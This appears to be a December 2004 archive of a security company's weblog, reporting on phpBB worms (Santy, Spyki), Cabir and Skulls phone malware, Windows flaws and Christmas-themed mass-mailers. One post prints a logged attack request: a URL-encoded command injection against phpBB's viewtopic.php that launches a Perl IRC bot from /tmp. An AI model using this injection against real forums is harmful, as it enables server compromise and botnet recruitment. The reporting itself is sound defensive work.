NEWS FROM THE LAB - December 2004


Friday, December 31, 2004

Anti-Santy-Worm going around? Posted by Mikko @ 09:34 GMT

There seems to be a new phpBB worm going around.

We don't have all the details yet, but this one seems to be using search engines to find vulnerable discussion forum sites and infects them via the phpBB highlight vulnerability. Then the worm tries to patch the system so Santy variants won't be able to infect it any more.

Finally, the worm drops a file called secure.php which contains this text and continues spreading further.

Anti-Santy-Worm defacement

This is not a beneficial worm. We have no idea how safe the patch the worm applies really is. We also have reports from phpBB administrators whose site is perfectly safe already to be under a denial-of-service attack caused by multiple requests created by this worm.


The last day of the year Posted by Mikko @ 06:50 GMT

So, it's 31st of December.

Here's the top 10 viruses of the whole year, as reported to our statistics system:

  1. W32/Netsky.P@mm - 24.3 %
  2. W32/Netsky.D@mm - 10.2 %
  3. W32/Zafi.B@mm - 9.8 %
  4. W32/Sober.I@mm - 7.3 %
  5. W32/Netsky.B@mm - 6.1 %
  6. W32/Sober.G@mm - 5.5 %
  7. W32/Lovgate.W@mm - 4.0 %
  8. W32/Bagle.Z@mm - 3.3 %
  9. W32/Netsky.X@mm - 2.5 %
 10. W32/Netsky.Q@mm - 1.9 %

The data is a bit skewed, as there are several large ISP reporting what they see on their email servers. So viruses like Sasser - which do not spread over email - get less coverage. Sasser probably would have been in the top 5 otherwise.

This is what the year looks like in a graph...the Mydoom.A peak in January is huge.


Thursday, December 30, 2004

Security locks revisited Posted by Mikko @ 15:14 GMT

Some of you might remember when we tested some security gadgets two months ago, and found a nameless cheapo USB security lock gadget seriously lacking.

USB lock

img from Bryan's blog
The idea was good (walk a way from your PC and it gets locked automatically). There wasn't anything wrong with the hardware, but the software was useless.

The good news is that a guy called Bryan Batchelder has taken the hardware and written software for it that actually works. Have a look at his blog for details.


Wednesday, December 29, 2004

Bluetooth hacking Posted by Mikko @ 15:52 GMT

We've heard that the Trifinite group has today held an interesting presentation on Bluetooth hacking. This was in the 21st Chaos Communication Congress, which is currently underway in Berlin.

Their slides are available here.

Blooover in action


Tuesday, December 28, 2004

Comair flight cancellations caused by a 16-bit counter Posted by Mikko @ 21:17 GMT

Image Copyright
Couple of days ago we discussed how Comair had cancelled over 1000 flights in USA during the Christmas holidays.

Turns out the reason behind this was that the flight planning software they were using was using a 16-bit counter to keep track of flight staff after 32768 changes it would simply stop working.


Details are available from an article in Cincinnati Post.


New cabir variant detected. Posted by Jarno @ 14:03 GMT

Today we got yet another variant of Cabir.

Cabir.J is compiled from the same sources as Cabir.H and is very similar to it.

F-Secure Mobile Anti-Virus detects the Cabir.J using generic detection as Cabir.Gen.


Windows vulnerabilities found over Christmas time Posted by Mikko @ 09:13 GMT

We're a bit worried about the four new Windows vulnerabilities that were found during Christmas holidays...especially since there a no current patches against them. Windows XP SP2 is immune to some - but not all of them.

These vulnerabilities could be used in future viruses - for example in massmailers.

They are:

* Windows LoadImage API vulnerability. Can be used for remote code execution through crafted bitmaps (.BMP), icons (.ICO), cursor (.CUR) and animated cursor (.ANI) files
* Animated cursor (.ANI) vulnerability that causes system crash.

* Help file overflow that can be exploited through crafted windows help (.HLP) files. This vulnerability reportedly also affects Windows XP SP2.

* HTML Help Control exploit that uses a number of different vulnerabilities to bypass IE's Local Zone protections in order to run scripts on the host. SP2 is vulnerable.

At least this last exploit has already been used for dropping Trojans.

While waiting for a patch, we recommend upgrading to Windows XP SP2 and using a browser no one else is using.


The Tsunami Tragedy Posted by Katrin @ 08:47 GMT

Like everyone else, we've been watching in horror the terrible tragedy caused by the earthquake and the tsunami in southern Asia. We would like to offer our condolences to anyone affected by it.

This is from everybody here at F-Secure.


Monday, December 27, 2004

Evolution in Cabir variants Posted by Jarno @ 12:48 GMT

We've found two new Cabir variants (Cabir.H and Cabir.I, respectively). As mentioned before, we've found several examples of phone malware over the last weeks, especially Cabir and Skulls variants, affecting Symbian Series 60 phones.

However, this time there are two important differences.

First of all, these new variants seem to be recompiled versions based on original Cabir source code. Which means that the Cabir source code is floating around in the underground. Which is bad news. We didn't know the sources were out there, and we've never seen them.

Second important difference is that these new Cabir variants fix a flaw that was slowing down original Cabir's spreading speed. Cabir originally would only spread to one new phone per reboot. Which explains why it so far has only managed to spread to eight countries (as far as we know), despite being in the wild for months already.

Cabir.H and Cabir.I can spread to an unlimited number of phones per reboot. As soon as a suitable target phone is seen, the worm sends itself there as a Bluetooth file transmission and keeps sending itself to that phone while it is still in range. Once the target phone leaves the area, Cabir.H will find a new target and continue spreading. This means that in conditions where people move around and new phones come in conctact with each other, the Cabir.H and Cabir.I can spread quite rapidly.

In addition of spreading, these new Cabirs don't do anything directly destructive or malicious. However, they do block all normal Bluetooth connectivity and they also drain the infected phones battery very fast.

We have no reports of Cabir.H and Cabir.I in the wild yet. However, this is probably only a matter of time, as the virus writer behind these variants has publicly posted them on his web page.

Both new Cabir variants are detected by F-Secure Mobile Anti-Virus

Symbian Series 60 worm / trojan history so far:

June 15th: Cabir.A is found
June 16th: Cabir.B is found
November 19th: Skulls.A trojan is found
November 29th: Skulls.B is found
December 9th: Cabir.C is found
December 9th: Cabir.D is found
December 9th: Cabir.E is found
December 21st: Skulls.C is found
December 21st: Cabir.F is found
December 21st: Cabir.G is found
December 26th: Cabir.H is found
December 26th: Cabir.I is found


PHP worm outbreaks not out of control Posted by Mikko @ 11:11 GMT

Although the concept of an automatic network worm that randomly targets sites with PHP vulnerabilities sounds really bad, in practice these latest Santy variants haven't gotten out of control.
This operation seems to be run by a group of Brazilian hackers that are creating a botnet which is controlled via an IRC server operating under

We checked the channel recently and it had less than 100 bots on it. So while there are lots of vulnerable sites out there, this worm is still under control.

It's actually surprising there aren't more infections, as the worm seems to be bounding some PHP sites aggressively, even to the point of creating a denial-of-service by just overloading them. This hits worst the sites that are best picked up by search engines. One administrator reported seeing 1-2 hits to his site every second for the past 20 hours.

In fact, the Santy variants that were found during Christmas holidays shouldn't be categorized under the Santy family at all - the code is different and they are targetting a different vulnerability. The only similarities are that they all are written in Perl, all target PHP sites and all use search engines.

Update:The latest variants have now indeed been categorized under a new family called "Spyki".


Sunday, December 26, 2004

Phpishing issues Posted by Mikko @ 08:51 GMT

Santy source code snippet
We're now detecting the various PHP-related malware found over the last days as variants of these families:


They all target PHP or phpBB vulnerabilities.

Some of them try to search for targets using AOL and Yahoo search engines. As far as we can see, the AOL searches will fail but Yahoo searches are working. So we're once again trying to contact search engine administrations to get them to block malicious searches.

Computer problem grounds holiday flights Posted by Mikko @ 06:07 GMT

Comair airlines canceled all of it's flights on Saturday 25th of December and Sunday 26th of December, leaving thousands of travellers stranded on airports.

According to CNN, "The computer system Comair uses to book pilots for flights broke down. Comair could not pinpoint a reason for the computer crash and could not say why there was no backup system."

F-Secure has no reason to suspect computer virus problems at this time.

Image from on 26th of December 2004


Saturday, December 25, 2004

25th of December Posted by Mikko @ 08:22 GMT

Today is the 25th of December. The Bacros virus activates today, deleting all files on all local hard drives.

Activation routine like that is pretty rare. We nowadays don't see destructive viruses too often...most of the new viruses just try to silently take over your machine instead of deleting files.

Bacros is in the wild. Over the last months we've received reports from several countries. But so far we haven't received any reports of overwritten hard drives. Then again, if you're hard drive is overwritten, you can't easily email us, can you?

Historically, Christmas time has been fairly calm virus-wise. The only exception that comes to mind would be the Remote Explorer incident from Christmas 1998. This was the first virus ever to run as a service under Windows NT, and caused a bit of a stir back then.


Santy-like activity Posted by Mikko @ 08:08 GMT

Several phpBB administrators have reported to us that they are seeing lots of Santy-like activity.

Like mentioned before, Google is filtering the searches that the original Santy (and the variants that were created by corruption) were using.

But now we're seeing fairly large network scans that are trying to find vulnerable phpBB forums in order to install IRC bots on them.

Typical requests look like this:

GET /phpBB2/viewtopic.php?t=533&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;;perl%20bot;;...


Friday, December 24, 2004

Merry Christmas Posted by Mikko @ 06:13 GMT

Merry Christmas to all of our readers from the F-Secure weblog staff!

Christma exec image copyright IEEE

Our Christmas greeting this year shows the payload of one of the first computer worms ever: CHRISTMA EXEC from 1987. This was a REXX worm affecting IBM mainframes. This pictures is taken from an excellent write-up of the worm which is available on IEEE's web pages. Authors of the article include the almost-legendary Steve White and David Chess from IBM.

So happy holidays. There will be four of us here at F-Secure monitoring the situation over the Christmas.


Thursday, December 23, 2004

MP3 and video versions of the Data Security Summary 2004 Posted by Mikko @ 10:33 GMT

Audio and video versions of F-Secure Corporation's Data Security Summary for 2004 are now available.

Video is available as a Real Media file here: video

MP3 is available here: mp3

Speaking about MP3's...we find it be really handy to listen to data security lectures, radio specials and interviews on our iPods or in our cars while doing something else. Places like ITConversations even have separate series for security-related audio. Also lots of the Black Hat Briefings lectures are available as audio (but you do need a Real-to-MP3 converter if you want to take them with you). And Vmyths has great selection of MP3s available (but you do have to dismangle the M3U files to get them).

So, let's hear your suggestions. Does anybody have good sources for audio that would be interesting to people working in data security? Let us know at weblog at our domain.


Wednesday, December 22, 2004

Google stops Santy Posted by Ceco @ 18:25 GMT

We are happy to report that Google is indeed filtering the requests coming from the Santy-infected machines as reported here: Wrapup on Case Santy

To verify this, after dissecting the worm in our test labs, we took a single query that the worm generates and sent it to Google. The result was an expected 403 error code with brief explanation why the search was denied as shown on the picture below.

403_google (66k image)


Wrapup on case Santy Posted by Mikko @ 06:17 GMT

This case is now over. The Santy worm is not spreading any more, thanks to Google.

Google started filtering the queries made by the worm around midnight GMT, effectively stopping the spread of the worm. Apparently they are doing this based on a combination of the search terms and the User-Agent header field.

This is from an email we got from the Google Security Team:

  While a seven hour response for something like this is not outrageous,
  we think we can and should do better. We will be reviewing our
  procedures to improve our response time in the future to similar problems.

Google has also started showing the defaced websites in it's index. MSN Search already had them visible over 12 hours ago, so apparently the indexing process takes longer at Google.

Like we reported earlier, MSN Search reports huge numbers of websites to be affected. However, if you keep viewing the search index pages, you get different results. MSN Search reports 29,000 hits, but runs out of the hits already on search index page 15 - with 153 actual hits shown. Google finds 202 defaced sites right now. It's hard to estimate how many actual sites got hit.

Results from MSN
Results from Google

Another thing that can be figured out from the search engines is the generation count of the worm. Santy displays it's generation number in the defacement. So, say, generation 5 would mean that this specific instance of the worm would have infected four web sites before this one.

The highest generation count we've been able to locate is 22.

Santy Generation 22

We won't be seeing much higher generation counts. One reason for that is that Santy gets easily corrupted. The exploit it uses is only able to transfer around 20 bytes of data at a time. So the worm transfers itself from one web site to another in small chunks. If a chunk gets missing, the worm might still work fine (it's Perl script, after all...Perl looks like line noise anyway) - or it might fail. More generations there are, more likely is it to fail because of this.

We can also adjust the first sighting time for this worm. One of our readers reports seeing Santy infection attempts in his phpBB logs already at 9:25 GMT on 20th of December - which is 18 hours earlier than our earliest sighting so far (thanks, Constantinos).

That's it. From our point of view this is now case closed.


Tuesday, December 21, 2004

Google could stop the Santy worm right now Posted by Mikko @ 19:12 GMT

We've been trying to reach the right persons at Google for the past hours...they could stop this Santy outbreak right now simply by stopping responding to the queries the viruses uses. This wouldn't hurt any end users and would in fact take load off from Google servers.

Doesn't any of our readers know any hardcore techies working at the right places in Google? Ask them to get in touch with us by mailing to weblog at our domain - thanks!


Two new Symbian malwares found Posted by Jarno @ 18:47 GMT

Well, this seems to be active day.

Today we also got another sample which contains two new Symbian malwares. MGDropper is a malicious file distributed as Metal Gear.SIS. It disables file managers and Anti-Virus programs (but fails to disable F-Secure Mobile Anti-Virus).

This thing also installs Cabir.G. Unlike Skulls trojans, MGDropper disables only the phone application installer, not all built in applications.

This thing is detected with Generic detection by F-Secure Mobile Anti-Virus.


Skulls.C and Cabir.F found Posted by Jarno @ 17:38 GMT

Today we got a sample that contains Skulls.C trojan, that is quite similar to other variants of Skulls family. The Skulls.C disables built in phone applications, most well known third party file managerss and installs Cabir.F on the phone.

Skulls.C also tries to disable F-Secure Mobile Anti-Virus - but fails.

As with other Skulls trojans the Cabir.F is dropped into incorrect directory so it won't start automatically. F-Secure Mobile Anti-Virus already has generic detection that can detect both Skulls.C and Cabir.F as Cabir.gen and them from being installed on the phone. So the case is rather low risk.


Vulnerable versions of phpBB Posted by Mikko @ 16:41 GMT

Apparently version 2.0.11 of phpBB is not vulnerable to the Santy worm. That's according to the description of the apparent vulnerability ("viewtopic.php highlight") posted to Securiteam's site.

Users of older versions might want to check out these tips posted to phpBB's own forum.

Also, this thread is discussing the same problem.


Lots of sites have been defaced by Santy.A worm Posted by Alexey @ 15:58 GMT

If you try to search for defaced sites using the MSN Search Engine, you will see an enormous amount of sites that have been defaced by the Santy.A worm. Search using the following text string:

"This site is defaced!!!" NeverEverNoSanity

Click HERE to search defaced websites using the above mentioned string.

At this moment the search finds tens of thousands defaced websites! It should be noted that some of the defaced sites have been restored already, but many are still defaced...


More on the new phpBB forum worm Posted by Mikko @ 15:46 GMT

This worm is written in Perl. It's searching vulnerable forum sites via Google. When a suitable site is found, the worm uses a remote exploit to gain access to it, defaces it and restarts random scanning for new hosts.

There has been several serious holes in the phpBB software over the years. One was discussed in Netcraft just days ago.

We don't know how many phpBB sites there are in the world, but Google search for inurl:phpbb inurl:viewtopic gives over a million hits...

The first defacement we heard about happened today at around 15:00 GMT.

Official home page of phpBB does not mention this incident yet.


New internet worm Santy spreading! Posted by Mikko @ 15:12 GMT

New worm Santy has started spreading. This one is infected only web servers, not end user computers. In fact, it infects sites running the popular phpBB discussion forum software.

Many sites are already affected...the end result typically looks like this:


We detect this worm as "Santy.A" with updates that are going out right now.


Monday, December 20, 2004

Spammers ordered to pay $1 billion Posted by Mikko @ 07:18 GMT

Spam, spam, spam, spam, spam, spam, spam, spam, beans, bacons and spam.
From CNN.COM: A judge has awarded an Internet service provider more than $1 billion in what is believed to be the largest judgment ever against spammers.

Three spammers (AMP Dollar Savings Inc, Cash Link Systems Inc and TEI Marketing Group) were ordered to pay US$ 1,080,140,000 (that's a lot of zeroes) to a small ISP operating in Iowa.

However, the spammers seem to be unreachable and there's little hope they would actually pay much in the real life.


Friday, December 17, 2004

Another new Atak found Posted by Mikko @ 15:42 GMT

A new minor variant of the Atak worm was found today (we detect it already).

This one also sends fake electronic Christmas cards.

Interestingly, it also contains a link to an image mocking the Lycos' "Make Love Not Spam" the image reads "Make Love With Spam":



Thursday, December 16, 2004

Nine year sentence for wardriving in USA Posted by Mikko @ 07:26 GMT

Lowe's logo Copyright (c) Lowe's
A 21-year old hacker has been sentenced to jail in Michigan for hacking via wardriving.

Wardriving is a technique in which you drive around with a car which has an antenna to search for vulnerable WLAN access points. Some spammers have been using this to get anonymous net access.

In this case, Brian Salcedo was sitting in a car on the parking lot of the local Lowe's (a home improvement store), trying to steal credit card numbers from the store's systems through their open WLAN network.

Mr. Salcedo was sentenced yesterday to nine years in jail. Which sounds like a pretty long sentence.

Salcedo, together with his partners Paul Timmins (aka noweb4u) and Adam Botbyl (aka itszer0) pleaded guilty in August according to a release from FBI.


Wednesday, December 15, 2004

It's that time of the year... Posted by Mikko @ 14:57 GMT

Zafi.D and Atak.H keep spreading, posing as Christmas cards. We've seen this many times before. With for example the Maldal and Navidad viruses.

As an example, Maldal was sending fake Christmas cards looking like this during Christmas 2001:


And some of the readers might even remember Happy99, arguably the first email massmailer ever. It posed as a Happy New Year greeting card:

Happy99 aka Ska virus

Our advice: steer away from electronic greeting cards. Go for the traditional pen-and-paper ones...


Another Christmas greeting virus found Posted by Alexey @ 13:37 GMT

A new variant of Atak worm was found on 15th of December 2004. The worm spreads in emails that have a subject "Merry X-Mas!" or "Happy New Year!". Here's an example of how the worm's message looks like:


F-Secure Anti-Virus detects Atak.h worm with the 2004-12-15_01 update.


Summary for year 2004 published Posted by Mikko @ 04:19 GMT

Wrap-up 2004
We've published our annual Data Security summary.

Year 2004 was split from the middle: the beginning of the year was record-breaking busy with a huge number of major new virus outbreaks and the "virus war" between Mydoom, Bagle and Netsky. After June, things calmed down, and we've only seen some outbreaks since.

Other developments: open-source botnets, massive phishing cases, big increase in professional virus writing. Number of known viruses passed the 100,000 mark. First real mobile phone viruses were found. Spamming is getting worse and worse - and more profitable for spammers.

On the other hand, year 2004 was the best year ever in actually catching virus writers and other cyber criminals.

The full wrap-up is available here:

Similar wrap-ups are available for 2003 and 2002 too.



Tuesday, December 14, 2004

Microsoft releases 5 new security updates Posted by Ceco @ 18:01 GMT

Today Microsoft released 5 new security updates. All five are marked with severity: important. Four out of the five updates are released to fix possible Remote Code Execution, and one fixes possible Elevation of Privilege.

Details can be found in the updated Security Bulletin for December.


Zafi.D upgraded to Radar Level 2 Posted by Sami @ 13:31 GMT

Due increased submissions, we have upgraded Zafi.D to Radar Level 2. Here is an example of an email sent by Zafi.D, in English:

Zafi.D email screenshot


New Zafi outbreak starting? Posted by Katrin @ 10:24 GMT

We received reports of a new Zafi.D worm variant today. As social engineering this one uses Christmas greetings in its emails in many different languages.

Monday, December 13, 2004

Lots of people find spam useful Posted by Mikko @ 13:21 GMT

Lots of people find spam useful. Since they are buying the products advertised in spam.

This is according to a new report from Forrester research, commissioned by the BSA. The survey found that 41% of Americans had purchased something via spam. The same percentage for France was 48% and for Brazilians, 66%!

Spam works because people by from spammers.

People, stop buying from spammers.

More data on the study from BSA.

Image Copyright 2004 Forrester Research and BSA


Friday, December 10, 2004

Wi-FI paint? Posted by Mikko @ 11:25 GMT

Image (c)
Well here's an interesting niche market. A company called Force Field Wireless is selling anti-WLAN paint!

"This specially formulated flat interior paint will help reduce the transmission of radio waves through walls, ceilings and doors. A great solution for protecting your Wi-Fi, Wi-Max, Bluetooth or any wireless network in the 5GHz or less frequency range. Stop radio interferences from slowing down your network. Prevent your wireless data from being hi-jacked."

So this would be security by decoration, I guess.



Jigsaw Piece - 386 Posted by Mikko @ 11:25 GMT


Thursday, December 9, 2004

Two new Cabir variants found Posted by Jarno @ 14:04 GMT

Today we got a sample that contains two new variants of Cabir worm.

The new variants are Cabir.C and Cabir.D. The variants are minor so called hex-edit variants, which means that while they show different text and use different filename they are otherwise identical to Cabir.B

The Cabir.C uses filename MYTITI.SIS and shows text MYTITI.

The Cabir.D uses filename [YUAN].SIS and shows text [YUAN].

Both Cabir samples arrived in Symbian installation file named "Norton AntiVirus 2004 Professional.sis",
which contains Cabir.B, Cabir.C and Cabir.D. We have named the file as SymbOS/Cabir.Dropper

F-Secure Mobile Anti-Virus detects the Cabir.C and Cabir.D variants with up to date databases and already provided detection for the Cabir.Dropper

Tomorrow I will go to RF shielded lab, and do more detailed analysis on the new variants.


New vulnerability affects multiple browsers Posted by Ero @ 05:21 GMT

Secunia has reported of a vulnerability allowing a third party to hi-jack, for instance, pop-ups from an legitimate site.

In other words, a malicious site would be able to direct a user to a real site (for instance a bank) and take over any pop-up such site might open (a login screen), leading to any data entered there being instantly compromised.


Wednesday, December 8, 2004

Virus attacking websites of the Chechen rebels Posted by Mikko @ 21:25 GMT

We have a small number of reports of a virus known as Maslan.

This worm can spread using LSASS and DCOM exploits as well as a massmailer in emails looking like this:

  From: (varies)
  To: (random address)
  Subject: 123
  Hello Bob
  Best regards,
  Attachment: PlayGirls2.exe

Interestingly, this virus launches a distributed denial-of-service attack against several websites operated by the Chechen rebels.
Chechen rebels have been fighting the Russian army for over a decade. They are best known for two recent sieges against civilians: one in a Moscow theater and one in a school in Beslan.

Chechen rebels have been operating several different websites for years. One of these sites is, which has been a source of lots of recent controversy. This site has been a target of several network attacks (some of them reportedly originating from the ip range owned by Russian Federal Security Service FSB). The site has been closed down and kicked out from several countries, including Russia, Lithuania, Estonia and Finland. Right now it's operating in Sweden.

Maslan launches the attack against these domains:


Monday, December 6, 2004

Fake Lycos screensaver Posted by Katrin @ 13:36 GMT

We got reports that a fake Lycos screensaver has been distributed in emails that look like this:

  Subject: Be the first to fight spam with Lycos screen saver
  Attachment: Lycos screensaver to fight

The file inside the attachment is not the famous Lycos' "Make love not spam" screensaver. Instead it's a RAR SFX archive that has embedded keylogger inside. Detection for that archive's executable file was added as 'TrojanDropper.FakeSpamFighter'.

Lycos has been notified of the incident.


Friday, December 3, 2004

Sorting out Cabir/Camtimer mess Posted by Jarno @ 12:01 GMT

The situation with repacked versions of Cabir.B is getting rather confusing. Some companies are talking about Cabir.B being in Camtimer.sis file, while others are talking about viruses called "Camtimer.A" and "Camtimer.B". So it's time to bring some order to this mess.

The malware in question here is SymbOS/Cabir.B, which some 'clever' people have packed into different SIS files using a Symbian tool called makeSIS.

Putting something into a SIS file is something like making Java JAR archive or Microsoft MSI installation file; you are making an archive file with extra information that is read by the system installer. So repacking Cabir.B into a new SIS file does not make a new Cabir variant, yet alone a new malware.

A SIS file contains quite a lot of properties information and one can do interesting things with just a SIS file, as we have seen with Skulls.A and Skulls.B. So it is easy to get confused.

Here's a list of Cabir.B's we have seen so far:

Original Caribe.B

Shows pop-up text "3d_OIDI500 by". Renames into and contains AIF file that changes the Cabir icon to look like a bag of gold. Renaming breaks the Cabir.B functionality. As an end result, instead of sending copies of itself via Bluetooth, it sends files with zero lenght.

Shows pop-up text "This is advanced camera timer for your phone". Installs Cabir.B and Camtimer camera timer software from Nokia. The Cabir.B is not set to start automatically on SIS install and is installed into wrong directory, so that it won't start when phone reboots. If user clicks on the icon manually, Cabir will start, and will spread as Caribe.sis - which contains only the Cabir.B executables. The same Camtimer.sis file is also found inside Skulls.B's SIS file, and is copied into system when Skulls.B is installed.

There exists also another version of Camtimer.SIS that some companies call Camtimer.B. We haven't got a sample of this one yet, but it appears to be almost identical to the one described above, with the exception that it installs Cabir.B into correct directory for it to start automatically. But this does not make it a new malware.


When is a defacement not a defacement? Posted by Mikko @ 06:31 GMT

Continuing on the status of the controversial site: We have been discussing the case with the maintainers of this site (who are in Sweden). They've checked their systems several times and have found no evidence of a defacement or of an intrusion of any kind.

Regardless of that, we've had several users report a defacement to us, even sending us screenshots like this:

Make defacements not spam

So, what's happening here?

Well, there are basically two choices. One is that some internet operators are not allowing traffic from their IP range to this website - instead, they are referring it to a site with this 'educational' message.

The other choice is DNS poisoning. DNS poisoning is an attack where a malicious attacker floods a domain name server with DNS requests and fake responses to them. The target is to convince a specific DNS server that domain FOO.BAR should point to when it really should point to, or so. However, such an attack isn't global - only users behind a specific DNS server would access the wrong site. But for those users it would be nearly impossibly to notice.

This vulnerability has been known for ages. It used to be fairly easy to do, but then random number generators used by BIND and other DNS tools got improved, making it much harder.

However, it is still doable. For more details, read a good paper on the subject, written by Joe Stewart (of LURHQ fame).


Thursday, December 2, 2004

A re-packed Netsky variant found Posted by Alexey @ 14:23 GMT

We have received a few submissions of a re-packed Netsky worm variant. It is functionally identical to the Netsky.Z worm, but is additionally packed with ASPack file compressor. We detect this variant as 'W32/Netsky.Z@mm' or as 'Email-Worm.Win32.NetSky.aa'.

Spammers fight back Posted by Alexey @ 09:37 GMT

In an interesting twist, apparently one of the spam sites under attack from Lycos' "Make Love not Spam" operation has turned the tables. The front page of a spammer site called (which used to sell cheap mortgage loans) has been changed to contain a Meta Refresh tag, redirecting all web traffic

As an end result, depending on how the Lycos client works, the screen savers downloaded from might be attacking the download site itself.

In another development, Lycos made a statement that this site was not defaced two days ago (see our weblog post on November 30th). However, we've received three independent reports from users who saw the defacement and even made screen shots of it...including one report from an editor of a computer magazine.

Update on 4th of December, 2004: Lycos has confirmed to us that their screensaver does not follow Meta Refresh tags, so this attempt by spammers will fail. --Mikko


Important note about Microsoft's MS04-040 update Posted by Sami @ 08:38 GMT

According to Microsoft, the MS04-040 update does not include all hotfixes or patches released since February's (MS04-004) or October's (MS04-038) Cumulative Updates for Internet Explorer. So, if you have received fixes via Microsoft or via their support providers, you should use Internet Explorer SP1 update rollup instead.

Like Ero mentioned earlier, MS04-040 fixes the Internet Explorer vulnerability that is exploited actively. This vulnerability was used, for example, by Bofra worm, so upgrading as soon as possible is highly recommended.


Wednesday, December 1, 2004

Microsoft releases critical update for IE Posted by Ero @ 19:41 GMT

Today Microsoft released a critical update for Internet Explorer. Affected systems are Windows NT, 2000 and Windows XP.
Windows XP SP2 and the 64 bit version are not affected.

More detailed information can be found in Microsoft Security Bulletin MS04-040

This update fixes a bug that allows remote code execution. This bug has been exploited by several malware lately.


Feature story on Sasser incident Posted by Mikko @ 11:03 GMT

Image (c) PC World
PC World published this last month but we just noticed the article now: there's a pretty good feature story on case Sasser in the November issue.

This article, written by a former intelligence officer Dan Verton, goes all the way to explain how exactly the LSASS hole was found, what Microsoft was doing to patch it and how the exploit code which ended up to the Sasser worm was generated.

There's also a nice timeline in the article.